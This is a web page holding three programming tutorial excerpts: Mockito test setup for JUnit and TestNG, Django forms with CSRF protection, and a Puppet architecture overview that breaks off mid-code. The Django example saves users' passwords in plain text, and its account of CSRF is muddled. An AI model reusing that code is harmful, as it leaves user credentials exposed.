(For more resources related to this topic, see here.) Mockito is an open source framework for Java that allows you to easily create test doubles (mocks). What makes Mockito so special is that it eliminates the common expect-run-verify pattern (which was present, for example, in EasyMock—please refer to http://monkeyisland.pl/2008/02/24/can-i-test-what-i-want-please for more details) that in effect leads to a lower coupling of the test code to the production code as such. In other words, one does not have to define the expectations of how the mock should behave in order to verify its behavior. That way, the code is clearer and more readable for the user. On one hand, Mockito has a very active group of contributors and is actively maintained. On the other hand, by the time this article is written, the last Mockito release (Version 1.9.5) would have been in October 2012. You may ask yourself the question, "Why should I even bother to use Mockito in the first place?" Out of many, Mockito offers the following key features: There is no expectation phase for Mockito—you can either stub or verify the mock's behavior You are able to mock both interfaces and classes You can produce little boilerplate code while working with Mockito by means of annotations You can easily verify or stub with intuitive argument matchers Before diving into Mockito as such, one has to understand the concept behind System Under Test (SUT) and test doubles. We will base on what Gerard Meszaros has defined in the xUnit Patterns (http://xunitpatterns.com/Mocks,%20Fakes,%20Stubs%20and%20Dummies.html). SUT (http://xunitpatterns.com/SUT.html) describes the system that we are testing. It doesn't have to necessarily signify a class but any part of the application that we are testing or even the whole application as such. As for test doubles (http://www.martinfowler.com/bliki/TestDouble.html), it's an object that is used only for testing purposes, instead of a real object. Let's take a look at different types of test doubles: Dummy: This is an object that is used only for the code to compile—it doesn't have any business logic (for example, an object passed as a parameter to a method) Fake: This is an object that has an implementation but it's not production ready (for example, using an in-memory database instead of communicating with a standalone one) Stub: This is an object that has predefined answers to method executions made during the test Mock: This is an object that has predefined answers to method executions made during the test and has recorded expectations of these executions Spy: These are objects that are similar to stubs, but they additionally record how they were executed (for example, a service that holds a record of the number of sent messages) An additional remark is also related to testing the output of our application. The more decoupled your test code is from your production code, the better since you will have to spend less time (or even none) on modifying your tests after you change the implementation of the code. Coming back to the article's content—this article is all about getting started with Mockito. We will begin with how to add Mockito to your classpath. Then, we'll see a simple setup of tests for both JUnit and TestNG test frameworks. Next, we will check why it is crucial to assert the behavior of the system under test instead of verifying its implementation details. Finally, we will check out some of Mockito's experimental features, adding hints and warnings to the exception messages. The very idea of the following recipes is to prepare your test classes to work with Mockito and to show you how to do this with as little boilerplate code as possible. Due to my fondness of the behavior driven development (http://dannorth.net/introducing-bdd/ first introduced by Dan North), I'm using Mockito's BDDMockito and AssertJ's BDDAssertions static methods to make the code even more readable and intuitive in all the test cases. Also, please read Szczepan Faber's blog (author of Mockito) about the given, when, then separation in your test methods—http://monkeyisland.pl/2009/12/07/given-when-then-forever/—since these are omnipresent throughout the article. I don't want the article to become a duplication of the Mockito documentation, which is of high quality—I would like you to take a look at good tests and get acquainted with Mockito syntax from the beginning. What's more, I've used static imports in the code to make it even more readable, so if you get confused with any of the pieces of code, it would be best to consult the repository and the code as such. Adding Mockito to a project's classpath Adding Mockito to a project's classpath is as simple as adding one of the two jars to your project's classpath: mockito-all: This is a single jar with all dependencies (with the hamcrest and objenesis libraries—as of June 2011). mockito-core: This is only Mockito core (without hamcrest or objenesis). Use this if you want to control which version of hamcrest or objenesis is used. How to do it... If you are using a dependency manager that connects to the Maven Central Repository, then you can get your dependencies as follows (examples of how to add mockito-all to your classpath for Maven and Gradle): For Maven, use the following code: <dependency> <groupId>org.mockito</groupId> <artifactId>mockito-all</artifactId> <version>1.9.5</version> <scope>test</scope> </dependency> For Gradle, use the following code: testCompile "org.mockito:mockito-all:1.9.5" If you are not using any of the dependency managers, you have to either download mockito-all.jar or mockito-core.jar and add it to your classpath manually (you can download the jars from https://code.google.com/p/mockito/downloads/list). Getting started with Mockito for JUnit Before going into details regarding Mockito and JUnit integration, it is worth mentioning a few words about JUnit. JUnit is a testing framework (an implementation of the xUnit famework) that allows you to create repeatable tests in a very readable manner. In fact, JUnit is a port of Smalltalk's SUnit (both the frameworks were originally implemented by Kent Beck). What is important in terms of JUnit and Mockito integration is that under the hood, JUnit uses a test runner to run its tests (from xUnit—test runner is a program that executes the test logic and reports the test results). Mockito has its own test runner implementation that allows you to reduce boilerplate in order to create test doubles (mocks and spies) and to inject them (either via constructors, setters, or reflection) into the defined object. What's more, you can easily create argument captors. All of this is feasible by means of proper annotations as follows: @Mock: This is used for mock creation @Spy: This is used to create a spy instance @InjectMocks: This is used to instantiate the @InjectMock annotated field and inject all the @Mock or @Spy annotated fields into it (if applicable) @Captor: This is used to create an argument captor By default, you should profit from Mockito's annotations to make your code look neat and to reduce the boilerplate code in your application. Getting ready In order to add JUnit to your classpath, if you are using a dependency manager that connects to the Maven Central Repository, then you can get your dependencies as follows (examples for Maven and Gradle): To add JUnit in Maven, use the following code: <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>4.11</version> <scope>test</scope> </dependency> To add JUnit in Gradle, use the following code: testCompile('junit:junit:4.11') If you are not using any of the dependency managers, you have to download the following jars: junit.jar hamcrest-core.jar Add the downloaded files to your classpath manually (you can download the jars from https://github.com/junit-team/junit/wiki/Download-and-Install). For this recipe, our system under test will be a MeanTaxFactorCalculator class that will call an external service, TaxService, to get the current tax factor for the current user. It's a tax factor and not tax as such since, for simplicity, we will not be using BigDecimals but doubles, and I'd never suggest using doubles to anything related to money, as follows: public class MeanTaxFactorCalculator { private final TaxService taxService; public MeanTaxFactorCalculator(TaxService taxService) { this.taxService = taxService; } public double calculateMeanTaxFactorFor(Person person) { double currentTaxFactor = taxService.getCurrentTaxFactorFor(person); double anotherTaxFactor = taxService.getCurrentTaxFactorFor(person); return (currentTaxFactor + anotherTaxFactor) / 2; } } How to do it... To use Mockito's annotations, you have to perform the following steps: Annotate your test with the @RunWith(MockitoJUnitRunner.class). Annotate the test fields with the @Mock or @Spy annotation to have either a mock or spy object instantiated. Annotate the test fields with the @InjectMocks annotation to first instantiate the @InjectMock annotated field and then inject all the @Mock or @Spy annotated fields into it (if applicable). The following snippet shows the JUnit and Mockito integration in a test class that verifies the SUT's behavior (remember that I'm using BDDMockito.given(...) and AssertJ's BDDAssertions.then(...) static methods: @RunWith(MockitoJUnitRunner.class) public class MeanTaxFactorCalculatorTest { static final double TAX_FACTOR = 10; @Mock TaxService taxService; @InjectMocks MeanTaxFactorCalculator systemUnderTest; @Test public void should_calculate_mean_tax_factor() { // given given(taxService.getCurrentTaxFactorFor(any(Person.class))).willReturn(TAX_FACTOR); // when double meanTaxFactor = systemUnderTest.calculateMeanTaxFactorFor(new Person()); // then then(meanTaxFactor).isEqualTo(TAX_FACTOR); } } To profit from Mockito's annotations using JUnit, you just have to annotate your test class with @RunWith(MockitoJUnitRunner.class). How it works... The Mockito test runner will adapt its strategy depending on the version of JUnit. If there exists a org.junit.runners.BlockJUnit4ClassRunner class, it means that the codebase is using at least JUnit in Version 4.5.What eventually happens is that the MockitoAnnotations.initMocks(...) method is executed for the given test, which initializes all the Mockito annotations (for more information, check the subsequent There's more… section). There's more... You may have a situation where your test class has already been annotated with a @RunWith annotation and seemingly, you may not profit from Mockito's annotations. In order to achieve this, you have to call the MockitoAnnotations.initMocks method manually in the @Before annotated method of your test, as shown in the following code: public class MeanTaxFactorCalculatorTest { static final double TAX_FACTOR = 10; @Mock TaxService taxService; @InjectMocks MeanTaxFactorCalculator systemUnderTest; @Before public void setup() { MockitoAnnotations.initMocks(this); } @Test public void should_calculate_mean_tax_factor() { // given given(taxService.getCurrentTaxFactorFor(Mockito.any(Person.class))).willReturn(TAX_FACTOR); // when double meanTaxFactor = systemUnderTest.calculateMeanTaxFactorFor(new Person()); // then then(meanTaxFactor).isEqualTo(TAX_FACTOR); } } To use Mockito's annotations without a JUnit test runner, you have to call the MockitoAnnotations.initMocks method and pass the test class as its parameter. Mockito checks whether the user has overridden the global configuration of AnnotationEngine, and if this is not the case, the InjectingAnnotationEngine implementation is used to process annotations in tests. What is done internally is that the test class fields are scanned for annotations and proper test doubles are initialized and injected into the @InjectMocks annotated object (either by a constructor, property setter, or field injection, in that precise order). You have to remember several factors related to the automatic injection of test doubles as follows: If Mockito is not able to inject test doubles into the @InjectMocks annotated fields through either of the strategies, it won't report failure—the test will continue as if nothing happened (and most likely, you will get NullPointerException). For constructor injection, if arguments cannot be found, then null is passed For constructor injection, if nonmockable types are required in the constructor, then the constructor injection won't take place. For other injection strategies, if you have properties with the same type (or same erasure) and if Mockito matches mock names with a field/property name, it will inject that mock properly. Otherwise, the injection won't take place. For other injection strategies, if the @InjectMocks annotated object wasn't previously initialized, then Mockito will instantiate the aforementioned object using a no-arg constructor if applicable. See also JUnit documentation at https://github.com/junit-team/junit/wiki Martin Fowler's article on xUnit at http://www.martinfowler.com/bliki/Xunit.html Gerard Meszaros's xUnit Test Patterns at http://xunitpatterns.com/ @InjectMocks Mockito documentation (with description of injection strategies) at http://docs.mockito.googlecode.com/hg/1.9.5/org/mockito/InjectMocks.html Getting started with Mockito for TestNG Before going into details regarding Mockito and TestNG integration, it is worth mentioning a few words about TestNG. TestNG is a unit testing framework for Java that was created, as the author defines it on the tool's website (refer to the See also section for the link), out of frustration for some JUnit deficiencies. TestNG was inspired by both JUnit and TestNG and aims at covering the whole scope of testing—from unit, through functional, integration, end-to-end tests, and so on. However, the JUnit library was initially created for unit testing only. The main differences between JUnit and TestNG are as follows: The TestNG author disliked JUnit's approach of having to define some methods as static to be executed before the test class logic gets executed (for example, the @BeforeClass annotated methods)—that's why in TestNG you don't have to define these methods as static TestNG has more annotations related to method execution before single tests, suites, and test groups TestNG annotations are more descriptive in terms of what they do; for example, the JUnit's @Before versus TestNG's @BeforeMethod Mockito in Version 1.9.5 doesn't provide any out-of-the-box solution to integrate with TestNG in a simple way, but there is a special Mockito subproject for TestNG (refer to the See also section for the URL) that should be part one of the subsequent Mockito releases. In the following recipe, we will take a look at how to profit from that code and that very elegant solution. Getting ready When you take a look at Mockito's TestNG subproject on the Mockito GitHub repository, you will find that there are three classes in the org.mockito.testng package, as follows: MockitoAfterTestNGMethod MockitoBeforeTestNGMethod MockitoTestNGListener Unfortunately, until this project eventually gets released you have to just copy and paste those classes to your codebase. How to do it... To integrate TestNG and Mockito, perform the following steps: Copy the MockitoAfterTestNGMethod, MockitoBeforeTestNGMethod, and MockitoTestNGListener classes to your codebase from Mockito's TestNG subproject. Annotate your test class with @Listeners(MockitoTestNGListener.class). Annotate the test fields with the @Mock or @Spy annotation to have either a mock or spy object instantiated. Annotate the test fields with the @InjectMocks annotation to first instantiate the @InjectMock annotated field and inject all the @Mock or @Spy annotated fields into it (if applicable). Annotate the test fields with the @Captor annotation to make Mockito instantiate an argument captor. Now let's take a look at this snippet that, using TestNG, checks whether the mean tax factor value has been calculated properly (remember that I'm using the BDDMockito.given(...) and AssertJ's BDDAssertions.then(...) static methods: @Listeners(MockitoTestNGListener.class) public class MeanTaxFactorCalculatorTestNgTest { static final double TAX_FACTOR = 10; @Mock TaxService taxService; @InjectMocks MeanTaxFactorCalculator systemUnderTest; @Test public void should_calculate_mean_tax_factor() { // given given(taxService.getCurrentTaxFactorFor(any(Person.class))).willReturn(TAX_FACTOR); // when double meanTaxFactor = systemUnderTest.calculateMeanTaxFactorFor(new Person()); // then then(meanTaxFactor).isEqualTo(TAX_FACTOR); } } How it works... TestNG allows you to register custom listeners (your listener class has to implement the IInvokedMethodListener interface). Once you do this, the logic inside the implemented methods will be executed before and after every configuration and test methods get called. Mockito provides you with a listener whose responsibilities are as follows: Initialize mocks annotated with the @Mock annotation (it is done only once) Validate the usage of Mockito after each test method Remember that with TestNG, all mocks are reset (or initialized if it hasn't already been done so) before any TestNG method! See also The TestNG homepage at http://testng.org/doc/index.html The Mockito TestNG subproject at https://github.com/mockito/mockito/tree/master/subprojects/testng The Getting started with Mockito for JUnit recipe on the @InjectMocks analysis
Read more
  • 0
  • 0
  • 11708

article-image-adding-developer-django-forms
Packt
18 Jun 2014
8 min read
Save for later

Adding a developer with Django forms

Packt
18 Jun 2014
8 min read
(For more resources related to this topic, see here.) When displaying the form, it will generate the contents of the form template. We may change the type of field that the object sends to the template if needed. While receiving the data, the object will check the contents of each form element. If there is an error, the object will send a clear error to the client. If there is no error, we are certain that the form data is correct. CSRF protection Cross-Site Request Forgery (CSRF) is an attack that targets a user who is loading a page that contains a malicious request. The malicious script uses the authentication of the victim to perform unwanted actions, such as changing data or access to sensitive data. The following steps are executed during a CSRF attack: Script injection by the attacker. An HTTP query is performed to get a web page. Downloading the web page that contains the malicious script. Malicious script execution. In this kind of attack, the hacker can also modify information that may be critical for the users of the website. Therefore, it is important for a web developer to know how to protect their site from this kind of attack, and Django will help with this. To re-enable CSRF protection, we must edit the settings.py file and uncomment the following line: 'django.middleware.csrf.CsrfViewMiddleware', This protection ensures that the data that has been sent is really sent from a specific property page. You can check this in two easy steps: When creating an HTML or Django form, we insert a CSRF token that will store the server. When the form is sent, the CSRF token will be sent too. When the server receives the request from the client, it will check the CSRF token. If it is valid, it validates the request. Do not forget to add the CSRF token in all the forms of the site where protection is enabled. HTML forms are also involved, and the one we have just made does not include the token. For the previous form to work with CSRF protection, we need to add the following line in the form of tags and <form> </form>: {% csrf_token %} The view with a Django form We will first write the view that contains the form because the template will display the form defined in the view. Django forms can be stored in other files as forms.py at the root of the project file. We include them directly in our view because the form will only be used on this page. Depending on the project, you must choose which architecture suits you best. We will create our view in the views/create_developer.py file with the following lines: from django.shortcuts import render from django.http import HttpResponse from TasksManager.models import Supervisor, Developer from django import forms # This line imports the Django forms package class Form_inscription(forms.Form): # This line creates the form with four fields. It is an object that inherits from forms.Form. It contains attributes that define the form fields. name = forms.CharField(label="Name", max_length=30) login = forms.CharField(label="Login", max_length=30) password = forms.CharField(label="Password", widget=forms.PasswordInput) supervisor = forms.ModelChoiceField(label="Supervisor", queryset=Supervisor.objects.all()) # View for create_developer def page(request): if request.POST: form = Form_inscription(request.POST) # If the form has been posted, we create the variable that will contain our form filled with data sent by POST form. if form.is_valid(): # This line checks that the data sent by the user is consistent with the field that has been defined in the form. name = form.cleaned_data['name'] # This line is used to retrieve the value sent by the client. The collected data is filtered by the clean() method that we will see later. This way to recover data provides secure data. login = form.cleaned_data['login'] password = form.cleaned_data['password'] supervisor = form.cleaned_data['supervisor'] # In this line, the supervisor variable is of the Supervisor type, that is to say that the returned data by the cleaned_data dictionary will directly be a model. new_developer = Developer(name=name, login=login, password=password, email="", supervisor=supervisor) new_developer.save() return HttpResponse("Developer added") else: return render(request, 'en/public/create_developer.html', {'form' : form}) # To send forms to the template, just send it like any other variable. We send it in case the form is not valid in order to display user errors: else: form = Form_inscription() # In this case, the user does not yet display the form, it instantiates with no data inside. return render(request, 'en/public/create_developer.html', {'form' : form}) This screenshot shows the display of the form with the display of an error message: Template of a Django form We set the template for this view. The template will be much shorter: {% extends "base.html" %} {% block title_html %} Create Developer {% endblock %} {% block h1 %} Create Developer {% endblock %} {% block article_content %} <form method="post" action="{% url "create_developer" %}" > {% csrf_token %} <!-- This line inserts a CSRF token. --> <table> {{ form.as_table }} <!-- This line displays lines of the form.--> </table> <p><input type="submit" value="Create" /></p> </form> {% endblock %} As the complete form operation is in the view, the template simply executes the as_table() method to generate the HTML form. The previous code displays data in tabular form. The three methods to generate an HTML form structure are as follows: as_table: This displays fields in the <tr> <td> tags as_ul: This displays the form fields in the <li> tags as_p: This displays the form fields in the <p> tags So, we quickly wrote a secure form with error handling and CSRF protection through Django forms. The form based on a model ModelForms are Django forms based on models. The fields of these forms are automatically generated from the model that we have defined. Indeed, developers are often required to create forms with fields that correspond to those in the database to a non-MVC website. These particular forms have a save() method that will save the form data in a new record. The supervisor creation form To broach ModelForms, we will take, for example, the addition of a supervisor. For this, we will create a new page. For this, we will create the following URL: url(r'^create-supervisor$', 'TasksManager.views.create_supervisor.page', name="create_supervisor"), Our view will contain the following code: from django.shortcuts import render from TasksManager.models import Supervisor from django import forms from django.http import HttpResponseRedirect from django.core.urlresolvers import reverse def page(request): if len(request.POST) > 0: form = Form_supervisor(request.POST) if form.is_valid(): form.save(commit=True) # If the form is valid, we store the data in a model record in the form. return HttpResponseRedirect(reverse('public_index')) # This line is used to redirect to the specified URL. We use the reverse() function to get the URL from its name defines urls.py. else: return render(request, 'en/public/create_supervisor.html', {'form': form}) else: form = Form_supervisor() return render(request, 'en/public/create_supervisor.html', {'form': form}) class Form_supervisor(forms.ModelForm): # Here we create a class that inherits from ModelForm. class Meta: # We extend the Meta class of the ModelForm. It is this class that will allow us to define the properties of ModelForm. model = Supervisor # We define the model that should be based on the form. exclude = ('date_created', 'last_connexion', ) # We exclude certain fields of this form. It would also have been possible to do the opposite. That is to say with the fields property, we have defined the desired fields in the form. As seen in the line exclude = ('date_created', 'last_connexion', ), it is possible to restrict the form fields. Both the exclude and fields properties must be used correctly. Indeed, these properties receive a tuple of the fields to exclude or include as arguments. They can be described as follows: exclude: This is used in the case of an accessible form by the administrator. Because, if you add a field in the model, it will be included in the form. fields: This is used in cases in which the form is accessible to users. Indeed, if we add a field in the model, it will not be visible to the user. For example, we have a website selling royalty-free images with a registration form based on ModelForm. The administrator adds a credit field in the extended model of the user. If the developer has used an exclude property in some of the fields and did not add credits, the user will be able to take as many credits as he/she wants. We will resume our previous template, where we will change the URL present in the attribute action of the <form> tag: {% url "create_supervisor" %} This example shows us that ModelForms can save a lot of time in development by having a form that can be customized (by modifying the validation, for example). Summary This article discusses Django forms. It explains how to create forms with Django and how to treat them. Resources for Article: Further resources on this subject: So, what is Django? [article] Creating an Administration Interface in Django [article] Django Debugging Overview [article]
Read more
  • 0
  • 0
  • 2091
article-image-designing-puppet-architectures
Packt
18 Jun 2014
21 min read
Save for later

Designing Puppet Architectures

Packt
18 Jun 2014
21 min read
(For more resources related to this topic, see here.) Puppet is an extensible automation framework, a tool, and a language. We can do great things with it, and we can do them in many different ways. Besides the technicalities of learning the basics of its DSL, one of the biggest challenges for new and not-so-new users of Puppet is to organize code and put things together in a manageable and appropriate way. It's hard to find a comprehensive documentation on how to use public code (modules) with our custom modules and data, where to place our logic, how to maintain and scale it, and generally, how to manage the resources that we want in our nodes and the data that defines them safely and effectively. There's not really a single answer that fits all these cases. There are best practices, recommendations, and many debates in the community, but ultimately, it all depends on our own needs and infrastructure, which vary according to multiple factors, such as the following: The number and variety of nodes and application stacks to manage The infrastructure design and number of data centers or separate networks to manage The number and skills of people who work with Puppet The number of teams who work with Puppet Puppet's presence and integration with other tools Policies for change in production In this article, we will outline the elements needed to design a Puppet architecture, reviewing the following elements in particular: The tasks to deal with (manage nodes, data, code, files, and so on) and the available components to manage them Foreman, which is probably the most used ENC around, with Puppet Enterprise The pattern of roles and profiles Data separation challenges and issues How the various components can be used together in different ways with some sample setups The components of Puppet architecture With Puppet, we manage our systems via the catalog that the Puppet Master compiles for each node. This is the total of the resources we have declared in our code, based on the parameters and variables whose values reflect our logic and needs. Most of the time, we also provide configuration files either as static files or via ERB templates, populated according to the variables we have set. We can identify the following major tasks when we have to manage what we want to configure on our nodes: Definition of the classes to be included in each node Definition of the parameters to use for each node Definition of the configuration files provided to the nodes These tasks can be provided by different, partly interchangeable components, which are as follows: site.pp is the first file parsed by the Puppet Master (by default, its path is /etc/puppet/manifests/site.pp) and eventually, all the files that are imported from there (import nodes/*.pp would import and parse all the code defined in the files with the .pp suffix in the /etc/puppet/manifests/nodes/ directory). Here, we have code in the Puppet language. An ENC (External Node Classifier) is an alternative source that can be used to define classes and parameters to apply to nodes. It's enabled with the following lines on the Puppet Master's puppet.conf: [master] node_terminus = exec external_nodes = /etc/puppet/node.rb What's referred by the external_nodes parameter can be any script that uses any backend; it's invoked with the client's certname as the first argument (/etc/puppet/node.rb web01.example.com) and should return a YAML formatted output that defines the classes to include for that node, the parameters, and the Puppet environment to use. Besides the well-known Puppet-specific ENCs such as The Foreman and Puppet Dashboard (a former Puppet Labs project now maintained by the community members), it's not uncommon to write new custom ones that leverage on existing tools and infrastructure-management solutions. LDAP can be used to store nodes' information (classes, environment, and variables) as an alternative to the usage of an ENC. To enable LDAP integration, add the following lines to the Master's puppet.conf: [master] node_terminus = ldap ldapserver = ldap.example.com ldapbase = ou=Hosts,dc=example,dc=com Then, we have to add Puppet's schema to our LDAP server. For more information and details, refer to http://docs.puppetlabs.com/guides/ldap_nodes.html. Hiera is the hierarchical key-value datastore. It is is embedded in Puppet 3 and available as an add-on for previous versions. Here, we can set parameters but also include classes and eventually provide content for files. Public modules can be retrieved from Puppet Forge, GitHub, or other sources; they typically manage applications and systems' settings. Being public, they might not fit all our custom needs, but they are supposed to be reusable, support different OSes, and adapt to different usage cases. We are supposed to be able to use them without any modification, as if they were public libraries, committing our fixes and enhancements back to the upstream repository. A common but less-recommended alternative is to fork a public module and adapt it to our needs. This might seem a quicker solution, but doesn't definitively help the open source ecosystem and would prevent us from having benefits from updates on the original repository. Site module(s) are custom modules with local resources and files where we can place all the logic we need or the resources we can't manage with public modules. They may be one or more and may be called site or have the name of our company, customer, or project. Site modules have particular sense as a companion to public modules when they are used without local modifications. On site modules, we can place local settings, files, custom logic, and resources. The distinction between public reusable modules and site modules is purely formal; they are both Puppet modules with a standard structure. It might make sense to place the ones we develop internally in a dedicated directory (module paths), which is different from the one where we place shared modules downloaded from public sources. Let's see how these components might fit our Puppet tasks. Defining the classes to include in each node This is typically done when we talk about node classification in Puppet. This is the task that the Puppet Master accomplishes when it receives a request from a client node and has to determine the classes and parameters to use for that specific node. Node classification can be done in the following different ways: We can use the node declaration in site.pp and other manifests eventually imported from there. In this way, we identify each node by certname and declare all the resources and classes we want for it, as shown in the following code: node 'web01.example.com' { include ::general include ::apache } Here, we may even decide to follow a nodeless layout, where we don't use the node declaration at all and rely on facts to manage the classes and parameters to be assigned to our nodes. An example of this approach is examined later in this article. On an ENC, we can define the classes (and parameters) that each node should have. The returned YAML for our simple case would be something like the following lines of code: --- classes: - general: - apache: parameters: dns_servers: - 8.8.8.8 - 8.8.4.4 smtp_server: smtp.example.com environment: production Via LDAP, where we can have a hierarchical structure where a node can inherit the classes (referenced with the puppetClass attribute) set in a parent node (parentNode). Via Hiera, using the hiera_include function just add in site.pp as follows: hiera_include('classes'). Then, define our hierarchy under the key named classes, what to include for each node. For example, with a YAML backend, our case would be represented with the following lines of code: --- classes: - general - apache In site module(s), any custom logic can be placed as, for example, the classes and resources to include for all the nodes or for specific groups of nodes. Defining the parameters to use for each node This is another crucial part, as with parameters, we can characterize our nodes and define the resources we want for them. Generally, to identify and characterize a node in order to differentiate it from the others and provide the specific resources we want for it, we need very few key parameters, such as the following (the names used here may be common but are arbitrary and are not Puppet's internal ones): role is almost a standard de facto name to identify the kind of server. A node is supposed to have just one role, which might be something like webserver, app_be, db, or anything that identifies the function of the node. Note that web servers that serve different web applications should have different roles (that is, webserver_site, webserver_blog, and so on). We can have one or more nodes with the same role. env or any name that identifies the operational environment of the node (if it is a development, test, qa, or production server). Note that this doesn't necessarily match Puppet's internal environment variable. Someone prefers to merge the env information inside role, having roles such as webserver_prod and webserver_devel. Zone, site, data center, country, or any parameter that might identify the network, country, availability zone, or datacenter where the node is placed. A node is supposed to belong to only one of this. We might not require this in our infrastructure. Tenant, component, application, project, and cluster might be the other kind of variables that characterize our node. There's not a real standard on their naming, and their usage and necessity strictly depend on the underlying infrastructure. With parameters such as these, any node can be fully identified and be served with any specific configuration. It makes sense to provide them, where possible, as facts. The parameters we use in our manifests may have a different nature: role/env/zone as defined earlier are used to identify the nodes; they typically are used to determine the values of other parameters OS-related parameters such as package names and file paths Parameters that define the services of our infrastructure (DNS servers, NTP servers, and so on) Username and passwords, which should be reserved, used to manage credentials Parameters that express any further custom logic and classifying need (master, slave, host_number, and so on) Parameters exposed by the parameterized classes or defines we use Often, the value of some parameters depend on the value of other ones. For example, the DNS or NTP server may change according to the zone or region on a node. When we start to design our Puppet architecture, it's important to have a general idea of the variations involved and the possible exceptions, as we will probably define our logic according to them. As a general rule, we will use the identifying parameters (role/env/zone) to define most of the other parameters most of the time, so we'll probably need to use them in our Hiera hierarchy or in Puppet selectors. This also means that we probably will need to set them as top scope variables (for example, via an ENC) or facts. As with the classes that have to be included, parameters may be set by various components; some of them are actually the same, as in Puppet, a node's classification involves both classes to include and parameters to apply. These components are: In site.pp, we can set variables. If they are outside nodes' definitions, they are at top scope; if they are inside, they are at node scope. Top scope variables should be referenced with a :: prefix, for example, $::role. Node scope variables are available inside the node's classes with their plain name, for example, $role. An ENC returns parameters, treated as top scope variables, alongside classes, and the logic of how they can be set depends entirely on its structure. Popular ENCs such as The Foreman, Puppet Dashboard, and the Puppet Enterprise Console allow users to set variables for single nodes or for groups, often in a hierarchical fashion. The kind and amount of parameters set here depend on how much information we want to manage on the ENC and how much to manage somewhere else. LDAP, when used as a node's classifier, returns variables for each node as defined with the puppetVar attribute. They are all set at top scope. In Hiera, we set keys that we can map to Puppet variables with the hiera(), hiera_array() and hiera_hash() functions inside our Puppet code. Puppet 3's data bindings automatically map class' parameters to Hiera keys, so for these cases, we don't have to explicitly use hiera* functions. The defined hierarchy determines how the keys' values change according to the values of other variables. On Hiera, ideally, we should place variables related to our infrastructure and credentials but not OS-related variables (they should stay in modules if we want them to be reusable). A lot of documentation about Hiera shows sample hierarchies with facts such as osfamily and operatingsystem. In my very personal opinion, such variables should not stay there (weighting the hierarchy size), as OS differences should be managed in the classes and modules used and not in Hiera. On public shared modules, we typically deal with OS-specific parameters. Modules should be considered as reusable components that know all about how to manage an application on different OS but nothing about custom logic. They should expose parameters and defines that allow users to determine their behavior and fit their own needs. On site module(s), we may place infrastructural parameters, credentials, and any custom logic, more or less based on other variables. Finally, it's possible and generally recommended to create custom facts that identify the node directly from the agent. An example of this approach is a totally facts-driven infrastructure, where all the node-identifying variables, upon which all the other parameters are defined, are set as facts. Defining the configuration files provided to the nodes It's almost certain that we will need to manage configuration files with Puppet and that we need to store them somewhere, either as plain static files to serve via Puppet's fileserver functionality using the source argument of the File type or via .erb templates. While it's possible to configure custom fileserver shares for static files and absolute paths for templates, it's definitively recommended to rely on the modules' autoloading conventions and place such files inside custom or public modules, unless we decide to use Hiera for them. Configuration files, therefore, are typically placed in: Public modules: These may provide default templates that use variables exposed as parameters by the modules' classes and defines. As users, we don't directly manage the module's template but the variables used inside it. A good and reusable module should allow us to override the default template with a custom one. In this case, our custom template should be placed in a site module. If we've forked a public shared module and maintain a custom version we might be tempted to place there all our custom files and templates. Doing so, we lose in reusability and gain, maybe, in short term usage simplicity. Site module(s): These are, instead, a more correct place for custom files and templates, if we want to maintain a setup based on public shared modules, which are not forked, and custom site ones where all our stuff stays confined in a single or few modules. This allows us to recreate similar setups just by copying and modifying our site modules, as all our logic, files and resources are concentrated there. Hiera: Thanks to the smart hiera-file backend, Hiera can be an interesting alternative place where to store configuration files, both static ones or templates. We can benefit of the hierarchy logic that works for us and can manage any kind of file without touching modules. Custom fileserver mounts can be used to serve any kind of static files from any directory of the Puppet Master. They can be useful if we need to provide via Puppet files generated/managed by third-party scripts or tools. An entry in /etc/puppet/fileserver.conf like: [data] path /etc/puppet/static_files allow *.example.com Allows serving a file like /etc/puppet/static_files/generated/file.txt with the argument: source => 'puppet:///data/generated/file.txt', Defining custom resources and classes We'll probably need to provide custom resources, which are not declared in the shared modules, to our nodes, because these resources are too specific. We'll probably want to create some grouping classes, for example, to manage the common baseline of resources and classes we want applied to all our nodes. This is typically a bunch of custom code and logic that we have to place somewhere. The usual locations are as follows: Shared modules: These are forked and modified to including custom resources; as already outlined, this approach doesn't pay in the long term. Site module(s): These are preferred place-to-place custom stuff, included some classes where we can manage common baselines, role classes, and other containers' classes. Hiera, partially, if we are fond of the create_resources function fed by hashes provided in Hiera. In this case, somewhere (in a site or shared module or maybe, even in site.pp), we have to place the create_resources statements. The Foreman The Foreman is definitively the biggest open source software product related to Puppet and not directly developed by Puppet Labs. The project was started by Ohad Levy, who now works at Red Hat and leads its development, supported by a great team of internal employees and community members. The Foreman can work as a Puppet ENC and reporting tool; it presents an alternative to the Inventory System, and most of all, it can manage the whole lifecycle of the system, from provisioning to configuration and decommissioning. Some of its features have been quite ahead of their times. For example, the foreman() function made possible for a long time what is done now with the puppetdbquery module. It allows direct query of all the data gathered by The Foreman: facts, nodes classification, and Puppet-run reports. Let's look at this example that assigns to the $web_servers variable the list of hosts that belong to the web hostgroup, which have reported successfully in the last hour: $web_servers = foreman("hosts", "hostgroup ~ web and status.failed = 0 and last_report < "1 hour ago"") This was possible long before PuppetDB was even conceived. The Foreman really deserves at least a book by itself, so here, we will just summarize its features and explore how it can fit in a Puppet architecture. We can decide which components to use: Systems provisioning and life-cycle management Nodes IP addressing and naming The Puppet ENC function based on a complete web interface Management of client certificates on the Puppet Master The Puppet reporting function with a powerful query interface The Facts querying function, equivalent to the Puppet Inventory system For some of these features, we may need to install Foreman's Smart Proxies on some infrastructural servers. The proxies are registered on the central Foreman server and provide a way to remotely control relevant services (DHCP, PXE, DNS, Puppet Master, and so on). The Web GUI based on Rails is quite complete and appealing, but it might prove cumbersome when we have to deal with a large number of nodes. For this reason, we can also manage Foreman via the CLI. The original foreman-cli command has been around for years but is now deprecated for the new hammer (https://github.com/theforeman/hammer-cli) with the Foreman plugin, which is very versatile and powerful as it allows us to manage, via the command line, most of what we can do on the web interface. Roles and profiles In 2012, Craig Dunn wrote a blog post (http://www.craigdunn.org/2012/05/239/) that quickly became a point of reference on how to organize Puppet code. He discussed his concept of roles and profiles. The role describes what the server represents, a live web server, a development web server, a mail server, and so on. Each node can have one and only one role. Note that in his post, he manages environments inside roles (two web servers on two different environments have two different roles): node www1 { include ::role::www::dev } node www2 { include ::role::www::live } node smtp1 { include ::role::mailserver } Then, he introduces the concept of profiles, which include and manage modules to define a logical technical stack. A role can include one or more profiles: class role { include profile::base } class role::www inherits role { include ::profile::tomcat } In environment-related subroles, we can manage the exceptions we need (here, for example, the www::dev role includes both the database and webserver::dev profiles): class role::www::dev inherits role::www { include 